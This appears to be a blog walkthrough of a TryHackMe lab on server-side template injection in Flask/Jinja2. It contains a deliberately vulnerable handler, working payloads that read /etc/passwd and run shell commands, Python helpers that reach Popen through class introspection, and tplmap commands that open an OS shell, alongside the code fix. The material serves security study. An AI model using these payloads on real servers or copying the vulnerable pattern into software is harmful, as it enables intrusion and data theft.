TryHackMe > Web Fundamentals: ZTH: Obscure Web Vulns – Part 1: SSTI

Learn and practice exploiting a range of unique web vulnerabilities - SSTI

Disclaimer!!!
The information provided in this blog is to be used for educational purposes only. All of the information in this blog is meant to help the reader to develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage. Hacking is a crime and I am not responsible for the way you use it.

Hello hackers! Today we are going to look at the ZTH room on TryHackMe. This is not going to be a usual walkthrough; rather, I will paste my notes from the room here. So enough talk, let's get to it.

SSTI

SSTI (Server Side Template Injection) occurs when user input ends up inside the source of a template and is evaluated by the template engine running on the server, so the user controls template code rather than just data. A quick test is to submit {{2+2}} (or {{7*7}}) and check whether the engine evaluates it; note that {{ }} is the Jinja2/Twig syntax, and other engines use other delimiters such as ${ } or <%= %>.

A template engine lets developers serve static HTML pages with dynamic elements. Take for instance a static profile.html page: the engine lets the developer reference a username variable in the template that is filled in with the current user's name at render time.

Example code: the submitted name is %-formatted into the template source before render_template_string evaluates it, so a hacker can inject template code into the website:

from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/", methods=["GET", "POST"])
def index():
    user_input = request.form.get("name", "")
    # Vulnerable on purpose: the name is spliced into the template source, so Jinja2 evaluates any {{ ... }} the user types
    template = """
<!DOCTYPE html><html><body>\
<form action="/" method="post">\
First name:<br>\
<input type="text" name="name" value="">\
<input type="submit" value="submit">\
</form><h2>Hello %s! </h2></body></html>""" % user_input
    return render_template_string(template)

Testing for SSTI with the basic probe {{2+2}}:

If the response shows 4 where the input is echoed, the engine evaluated the expression and the page is vulnerable to SSTI. If {{2+2}} comes back literally, the input was treated as data, not template code.
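The two handlers and the probe below are an added, self-contained Python example, not code from the room or from this post. The small toy_render function stands in for a real engine such as Jinja2 (it only evaluates {{ }} arithmetic and context lookups) so the script runs offline, and every name in it (toy_render, vulnerable_handler, fixed_handler, detect_ssti, PROBE_SYNTAX) is my own. It shows why %-formatting input into the template source is the bug, what the fix looks like (pass the value as a context variable), and a probe that avoids the false positive a bare 2+2 invites.

```python
import re

# Stand-in for a template engine, constructed for this demo: it evaluates
# {{ expr }} in the template SOURCE, where expr is either a context variable
# or plain integer arithmetic. Real engines do the same with far more power.
_TAG = re.compile(r"\{\{\s*(.*?)\s*\}\}")
_ARITH = re.compile(r"[\d\s+\-*/()]+")


def toy_render(source, context):
    def evaluate(match):
        expr = match.group(1)
        if expr in context:
            return str(context[expr])
        if _ARITH.fullmatch(expr):
            return str(eval(expr, {"__builtins__": {}}, {}))  # arithmetic only
        return match.group(0)
    # re.sub does not re-scan replacement text, so rendered values are never
    # evaluated a second time, exactly like a real engine.
    return _TAG.sub(evaluate, source)


def vulnerable_handler(user_input):
    # Same mistake as the post's snippet: the input is %-formatted into the
    # template source before rendering, so "{{2+2}}" becomes template code.
    template = "<h2>Hello %s!</h2>" % user_input
    return toy_render(template, {})


def fixed_handler(user_input):
    # The fix: the template source is a constant; user data enters only as a
    # context value, so it is printed verbatim instead of evaluated.
    return toy_render("<h2>Hello {{ name }}!</h2>", {"name": user_input})


# (engine family, open marker, close marker) for arithmetic probes
PROBE_SYNTAX = [
    ("jinja2/twig", "{{", "}}"),
    ("freemarker/mako", "${", "}"),
    ("erb", "<%=", "%>"),
]


def detect_ssti(send, a=1117, b=2131):
    """Probe each syntax with a*b and return the family that evaluated it.

    ``send(payload)`` submits one value and returns the response body. A large
    product is used instead of 2+2 because "4" appears in almost any page and
    would give a false positive; the probe counts as evaluated only if the
    product is present AND the literal probe is not reflected back.
    """
    expected = str(a * b)
    for engine, open_, close in PROBE_SYNTAX:
        probe = "%s%d*%d%s" % (open_, a, b, close)
        body = send(probe)
        if expected in body and probe not in body:
            return engine
    return None


if __name__ == "__main__":
    print(vulnerable_handler("{{7*7}}"))   # the expression is evaluated
    print(fixed_handler("{{7*7}}"))        # the expression is just text
    print(detect_ssti(vulnerable_handler), detect_ssti(fixed_handler))
```

With real Flask the fix is the same shape: render_template_string("<h2>Hello {{ name }}!</h2>", name=user_input) with autoescaping left on, so user data never reaches the template source.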

Further exploitation: PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)

We can read local files on the server (the template sandbox is escaped to reach Python's file class; this is not LFI in the include sense). The payload walks from an empty string up its MRO to the object class, lists every loaded subclass and picks index 40, which is the file class on the Python 2 interpreter behind the room. Two caveats: the index depends on the interpreter build and on what the application has imported, so list __subclasses__() first and verify it, and __mro__[2] only exists on Python 2, where str's MRO is (str, basestring, object); on Python 3 it is (str, object), so use __mro__[-1] there and there is no file class at all.

# ''.__class__.__mro__[2].__subclasses__()[40] = file class (Python 2, index verified for this target)
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

We can also execute commands. config is Flask's configuration object; its class's __init__ is defined in a module that imports os, so __init__.__globals__['os'] is the os module and os.popen runs the command:

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
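The helpers below are an added Python example, not part of the room or this post, written to show what the two payloads above actually do and why the hardcoded index 40 is brittle. They run against the local interpreter with the standard library only: subprocess.Popen stands in for Flask's config class as the function whose __globals__ we walk, and the function names (object_subclasses, find_subclass_index, run_via_subclass, globals_via_init, read_file_via_globals, popen_payload) and the sample file content are mine.

```python
import os
import subprocess  # imported so that subprocess.Popen is a loaded subclass of object
import tempfile


def object_subclasses():
    # Walk from the str literal to ``object`` and list every loaded subclass.
    # Python 3: str.__mro__ is (str, object), so the Python 2 style __mro__[2]
    # raises IndexError; __mro__[-1] is object on both versions.
    return ''.__class__.__mro__[-1].__subclasses__()


def find_subclass_index(name):
    """Index N a ``__subclasses__()[N]`` payload would need for class ``name``.

    The index (40 in the post's Python 2 payload) depends on the interpreter
    build and on which modules the target has imported, so look it up instead
    of hardcoding it. Returns None if no loaded class has that name.
    """
    for i, cls in enumerate(object_subclasses()):
        if cls.__name__ == name:
            return i
    return None


def subclass_name_at(index):
    return object_subclasses()[index].__name__


def run_via_subclass(cmd):
    """Command execution the way the ``__subclasses__`` payload does it, in-process:
    reach subprocess.Popen through the class list, never by importing it."""
    popen = object_subclasses()[find_subclass_index("Popen")]
    out, _ = popen(cmd, shell=True, stdout=-1).communicate()  # -1 == subprocess.PIPE
    return out.decode()


def globals_via_init(cls, name):
    """The ``config.__class__.__init__.__globals__['os']`` trick: a function's
    ``__globals__`` is the dict of the module that defined it. Flask's Config is
    defined in a module that imports os; here subprocess.Popen stands in for it."""
    return cls.__init__.__globals__[name]


def read_file_via_globals(path):
    """Python 3 replacement for the Python 2 ``file`` class gadget: pull ``open``
    out of the ``__builtins__`` reachable from a function's ``__globals__``."""
    builtins = globals_via_init(subprocess.Popen, "__builtins__")
    # __builtins__ is a dict in imported modules but a module object in __main__.
    opener = builtins["open"] if isinstance(builtins, dict) else builtins.open
    with opener(path) as fh:
        return fh.read()


def demo_file_read():
    # Constructed sample file so the read chain can be exercised offline.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write("ssti file read ok")
    try:
        return read_file_via_globals(tmp.name)
    finally:
        os.unlink(tmp.name)


def popen_payload(cmd):
    """Jinja2 payload that locates Popen by name at render time, so it works
    without knowing the target's subclass index in advance."""
    return (
        "{% for c in ''.__class__.__mro__[-1].__subclasses__() %}"
        "{% if c.__name__ == 'Popen' %}"
        "{{ c('" + cmd + "', shell=True, stdout=-1).communicate()[0] }}"
        "{% endif %}{% endfor %}"
    )


if __name__ == "__main__":
    print("Popen index on this interpreter:", find_subclass_index("Popen"))
    print(run_via_subclass("id"))
    print(popen_payload("id"))
```

The loop in popen_payload is the same idea as find_subclass_index, moved into the template: it is what to send when you cannot enumerate __subclasses__() on the target first.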

Automatic exploitation:

tplmap.py – automates detection and exploitation of SSTI, up to a shell on the underlying OS

Syntax: the basic tplmap syntax differs depending on whether the vulnerable parameter is sent by GET or POST. For GET the parameter sits in the URL passed with -u; for POST it is passed with -d, which takes the request body in query-string form (param1=value1&param2=value2).

Tplmap does more than confirm the injection: besides reading and writing files on the target, it can reach the underlying operating system with options such as --os-cmd and --os-shell. The following screenshot lists the options that can be used to access the underlying operating system:

Example: how to cat /etc/passwd on 10.10.10.10:5000 with the vulnerable POST parameter noot

./tplmap.py -u http://10.10.10.10:5000/ -d 'noot' --os-cmd "cat /etc/passwd"

Example: how to get a remote shell on 10.10.60.177:80 with the vulnerable POST parameter name

./tplmap.py -u http://10.10.60.177/ -d 'name' --os-shell

Installing tplmap

I'm also appending a HOWTO on installing tplmap, because I know from my own experience that it can get frustrating if you are not familiar with Python, pip, etc.

You can download tplmap from GitHub:

After it is downloaded, cd into the tplmap/ directory:

You need to install the requirements:

If you are following along, you will get the following errors:

It will also complain about a wsgiref dependency:

And when you try to run the program:

The main problem is that tplmap.py is written in Python 2, so its dependencies must also be installed for Python 2: use pip2 instead of pip3.

So download pip2 from https://bootstrap.pypa.io/pip/2.7/get-pip.py:

After get-pip.py is downloaded, run it with Python 2:

As you can see, pip2 is installed after that. For me, it's installed in the /home/adametim/.local/bin/ directory, which is not in the $PATH variable. It basically means that you cannot run pip2 just by using its name; you have to specify the full path to pip2. So if we want to install the requirements of tplmap, in my case we need to do it in the following way:

The installation of requirements should successfully complete:

After that, you can fire up the tplmap.py script.

That’s it for this part. Thank you for reading this and see you at the next blog post!

All credits go to Paradox (https://tryhackme.com/p/Paradox) who has created this excellent room. You can find it at https://tryhackme.com/room/zthobscurewebvulns
